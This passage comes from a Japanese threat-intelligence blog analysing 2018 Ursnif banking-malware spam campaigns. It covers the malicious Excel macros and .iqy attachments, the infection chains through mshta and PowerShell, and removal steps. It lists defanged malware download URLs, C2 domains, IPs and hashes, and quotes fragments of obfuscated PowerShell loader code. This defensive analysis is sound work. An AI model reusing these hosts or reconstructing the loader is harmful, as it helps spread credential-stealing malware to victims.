自動起動の設定は以下の様にレジストリに設定されます。

f:id:bomccss:20181026190621p:plain

 

感染したursnif を駆除するためには、以下の手順を実施する必要があります。
1.ursnifが感染しているExplorer.exe のプロセスを停止する
2.自動起動レジストリに記載されているursnifの設定を削除する。
3.自動起動レジストリに記載されているursnifの本体を削除する。

 

マルウェア(二次検体)その2

今回の二次検体は別のハッシュ値のものがあります。
10/25以降と思われますが、beblohからダウンロードされるマルウェアが変化しました。
こちらも同じく国内をターゲットとしたursnifと思われます。動きは同じです。

https://www.virustotal.com/#/file/34e6ca7fcd9b02405980bd6a92e20b8f972b0988e90576135c4ce12216f12f7e/details
https://www.hybrid-analysis.com/sample/34e6ca7fcd9b02405980bd6a92e20b8f972b0988e90576135c4ce12216f12f7e?environmentId=100
https://www.vmray.com/analyses/34e6ca7fcd9b/report/files.html
https://urlhaus.abuse.ch/browse.php?search=34e6ca7fcd9b02405980bd6a92e20b8f972b0988e90576135c4ce12216f12f7e

さて、この中で注目したいのは一番下のurlhausのURLです。
同一ハッシュのマルウェアが以下の3つのURLからダウンロードされています。

hxxp://lersow[.]com/images/calcs[.]exe
hxxp://akvilhelmova[.]cz/images/stories/fruit/history_c[.]exe
hxxp://socco[.]nl/galleries/html600lightscapes/datet[.]exe

この中で特に注目したいのが一番下のドメインです。
このドメインには見覚えがあります。
このドメインは7月~8月に発生していた国内のursnifのばらまきで使用されていたドメインです。

なお、1つ目の2次検体でも以下URLにはよく見ると同一ドメインが使用されています。またこのURLではタイミングにより別のハッシュ値がダウンロードされたようです。
hxxp://akvilhelmova[.]cz/images/stories/fruit/history_c[.]exe
https://www.hybrid-analysis.com/sample/2b277c411944cb25bf454ad5dc38d32e8eed45eac058304982c15646720990cf?environmentId=100

これまでの配信では、同一ハッシュを複数箇所から配信されることはありませんでした。
それがなぜ、複数ドメインから配信されるようになっているのかは不明です。
確認できていませんが、最初のxlsファイルや途中のbeblohによっては別のドメインから取得するようなものがあるのかもしれません。
二日後(10/26)に試した際には、既に一番下のドメイン以外は停止状態であり、上記解析で使用したbeblohからは一番上のドメインへ接続しようとし、失敗している状態でした。
ただ、少なくとも以前に使用していたドメインと同じドメインを使用するということは、攻撃者側は同一である可能性が非常に高いと思われます。
また、今後も国内に対して引き続き不審メールのばらまきによる感染を狙う攻撃が続くことが予想されます。

 

IoC
●URL
hxxps://images2.imgbox[.]com/ca/88/A2ZSlW6S_o.png
hxxp://pigertime[.]com/mksettting
hxxps://oaril[.]com
hxxp://lersow[.]com/images/beckky[.]exe
hxxp://lersow[.]com/images/calcs[.]exe
hxxp://akvilhelmova[.]cz/images/stories/fruit/history_c[.]exe
hxxp://socco[.]nl/galleries/html600lightscapes/datet[.]exe
hxxps://purbs[.]com

●IP
134.119.234[.]175
47.254.153[.]36
62.141.244[.]144

●Hash(SHA256)
54303e5aa05db2becbef0978baa60775858899b17a5d372365ba3c5b1220fd2e
b7a6ebfb32c76763473cf2d59a6cec856fe34c14bd47362e7fdf05bc8aa6a65c
f8b3ebde86931a45ffe0e187704aee1968a023d2539c5ab622c7073d70a8fba6
03fe36e396a2730fa9a51c455d39f2ba8168e5e7b1111102c1e349b6eac93778
2b277c411944cb25bf454ad5dc38d32e8eed45eac058304982c15646720990cf
34e6ca7fcd9b02405980bd6a92e20b8f972b0988e90576135c4ce12216f12f7e

*1:^^^&('a') ("{0}{1}{3}{2}" -f 'Net.','We','t','bClien'

*2:${p}."B"-band15)*16)-bor(${p}."g" -band 15

2018/08/08(水) 『ご請求額の通知』『インボイス』『プロジェクト』『写真』『支払い』『文書』『請求・支払データ』『資料』の調査

8/6に続き、8/8にも.iqyファイルを添付した不審メール のばらまきを確認しています。

 

■日時
2018/8/8 17:00頃 - 

■件名
ご請求額の通知
インボイス
プロジェクト
写真
支払い
文書
請求・支払データ
資料

■添付ファイル名
文書_nnnnn.iqy
※nnnnnは数字5桁

f:id:bomccss:20180810030314p:plain

■通信先
添付ファイルが実行されると、まず以下にアクセスを行います。
hxxp://jiglid[.]com/excel

f:id:bomccss:20180810031512p:plain

Cmd.exeからPowerShellで次に以下へアクセスします。
hxxp://jiglid[.]com/version

f:id:bomccss:20180810032506p:plain

ここまでの.iqyファイル、excelファイル、versionファイル、共に8/6で使用されたファイルと次のファイルへのリンクURLが異なるのみで同様の構成のファイルです。
.iqyファイルはアンチウイルスベンダが幾つか検知するようになりましたが、攻撃者が簡単に使いまわしが効く、やっかいな攻撃手法と言えます。

 

■一次検体
以下のファイルが最後のファイルで、不正送金マルウェアURSNIFです。
hxxp://jiglid[.]com/JP

https://www.hybrid-analysis.com/sample/87f0e03c2bb71d7fd620f5693700fca08eefe8f42803051a9d1c4f90e0c5fd57/5b6aa9197ca3e109b452ebe3
●C2:
hxxps://siberponis[.]com
IP: 47.254.203.76
hxxps://baferdifo[.]com

1つ目のC2はこれまでの攻撃キャンペーンでも目にしていたものですが、2つ目のC2はこれまでに見たことのないアドレスです。今後はこのアドレスがしばらくC2として使うものと思われます。
また、C2へのアクセスですが、これまでは443/tcphttpsでアクセスをしていましたが、今回よりhttpsではなく独自プロトコルで通信をするようになっています。
通常の443通信とは異なる通信を検知することで検知可能かも知れません。

 

IoC
●URL
hxxp://jiglid[.]com/excel
hxxp://jiglid[.]com/version
hxxp://jiglid[.]com/JP
hxxps://siberponis[.]com
hxxps://baferdifo[.]com
●IP
47.254.203.76
●HASH(SHA256)
87f0e03c2bb71d7fd620f5693700fca08eefe8f42803051a9d1c4f90e0c5fd57

2018/08/07(火) 『<要返信:FAX>営業○・出荷×』『注文書[※数字4桁]』『インボイス Re: 進捗』の調査

Excelの添付ファイルによるマルウェアへの感染を狙った不審メールのばらまきを観測しました。

 

■日時
2018/08/07 16:30 頃 - 19:00 頃

■件名
<要返信:FAX>営業○・出荷×
注文書[※数字4桁]
インボイス Re: 進捗

■添付ファイル
FAX[出荷].xls
※件名 <要返信:FAX>営業○・出荷× のもの
https://www.hybrid-analysis.com/sample/d48a46e4a294755055ea59256450463b644236b32f62ecbb103b8f0337c4247c/5b69464a7ca3e14611105ff7
https://www.hybrid-analysis.com/sample/8957623c094f3ccdec8102f37d72d39279ecaa6a00f61cfe0c16d34105401e21?environmentId=100
https://www.hybrid-analysis.com/sample/8957623c094f3ccdec8102f37d72d39279ecaa6a00f61cfe0c16d34105401e21?environmentId=100
注文書_office.xls
※件名 注文書[※数字4桁] のもの
https://www.hybrid-analysis.com/sample/324c2f02ac07b1610413d4f14a3f72b91bc322c1497ed01c15a5793192c1acd5?environmentId=100
https://www.hybrid-analysis.com/sample/324c2f02ac07b1610413d4f14a3f72b91bc322c1497ed01c15a5793192c1acd5?environmentId=100
※2018.08.07.xls
※件名 インボイス Re: 進捗 のもの
https://www.hybrid-analysis.com/sample/ae2a04b491f6f19d737b2693b26f7a5d54c724b66d48620577dfbc21f38690b8/5b6965837ca3e1411e39b7b6

添付ファイルは複数種類ありますが、通信先等はどれも同じです。
添付ファイルを開きマクロを有効化すると、最終的にはマルウェアに感染します。

f:id:bomccss:20180810013934p:plain

このExcelにはマクロがついています。マクロの中身はこちらです。Excelが開きマクロが有効化されると Workbook_Open() が呼び出されshellが実行されます。

f:id:bomccss:20180810014229p:plain

このマクロを実行するとReplace等によりcmd.exe /c が作られ、その引数はoX関数により作られます。
oX関数ではcells(5,1)つまりはA5セルを引数としてC2関数にわたされます。A5セルの中身はこちらです。

f:id:bomccss:20180810014521p:plain

C2関数の部分は全て実行されるとmshta.exeからPowerShell.exeのスクリプトになります。

f:id:bomccss:20180810022215p:plain

f:id:bomccss:20180810014818p:plain


■通信先
添付ファイルのマクロが実行されると、上記流れにより、以下へとアクセスします。
hxxp://jiglid[.]com/out
IPは複数に紐付いています。
109.166.237.170
134.19.224.215
186.87.135.2
188.27.226.49
197.255.246.6
2.89.149.96
31.5.167.149
37.34.176.37
46.55.145.49
5.204.221.1
80.238.111.206
82.79.217.89
86.123.64.43
86.126.136.160
89.149.63.2

f:id:bomccss:20180810020202p:plain

中身はよくわからないファイルとなっていますが、先程のPowerShellにより、この内容がxorされることで新たなPowerShellスクリプトが作成され、以下のファイルを取得します。
hxxp://jiglid[.]com/1.tmp

f:id:bomccss:20180810020701p:plain

このファイルはマイドキュメント配下に1.eというファイルとして作成されます。
これを更に変換をかけることで、LevelUpd.exeという実行ファイルになります。

 

■一次検体(URSNIF)

最後に作成されたexeファイルは不正送金マルウェアのURSNIFです。

●C2
hxxps://siberponis[.]com
IP:47.254.203[.]76

■プロセスの動き 
プロセスの動きは以下となります。

f:id:bomccss:20180810021403p:plain

Excel起動からsvchost.exeが起動するまでのコマンドは以下です。

f:id:bomccss:20180810023350p:plain

 URSNIF実行後の初期感染時の端末情報を取得する際のコマンドは以下です。

f:id:bomccss:20180810023427p:plain

■その他
自動起動の手法はこれまで通りマルウェア本体が設定されていました。
JC3のURSNIF感染判定サイトでは判定できませんでした。
銀行サイト等へアクセスした際に取得する情報はWebアクセスの情報とキーロガーで動画取得はありませんでした。

 

IoC
●URL
hxxp://jiglid[.]com/out
hxxp://jiglid[.]com/1.tmp
hxxps://siberponis[.]com
●IP
109.166.237.170
134.19.224.215
186.87.135.2
197.255.246.6
2.89.149.96
31.5.167.149
37.34.176.37
46.55.145.49
5.204.221.1
80.238.111.206
82.79.217.89
86.123.64.43
86.126.136.160
89.149.63.2
47.254.203.76
●HASH(SHA256)
d48a46e4a294755055ea59256450463b644236b32f62ecbb103b8f0337c4247c
8957623c094f3ccdec8102f37d72d39279ecaa6a00f61cfe0c16d34105401e21
8957623c094f3ccdec8102f37d72d39279ecaa6a00f61cfe0c16d34105401e21
324c2f02ac07b1610413d4f14a3f72b91bc322c1497ed01c15a5793192c1acd5
324c2f02ac07b1610413d4f14a3f72b91bc322c1497ed01c15a5793192c1acd5
ae2a04b491f6f19d737b2693b26f7a5d54c724b66d48620577dfbc21f38690b8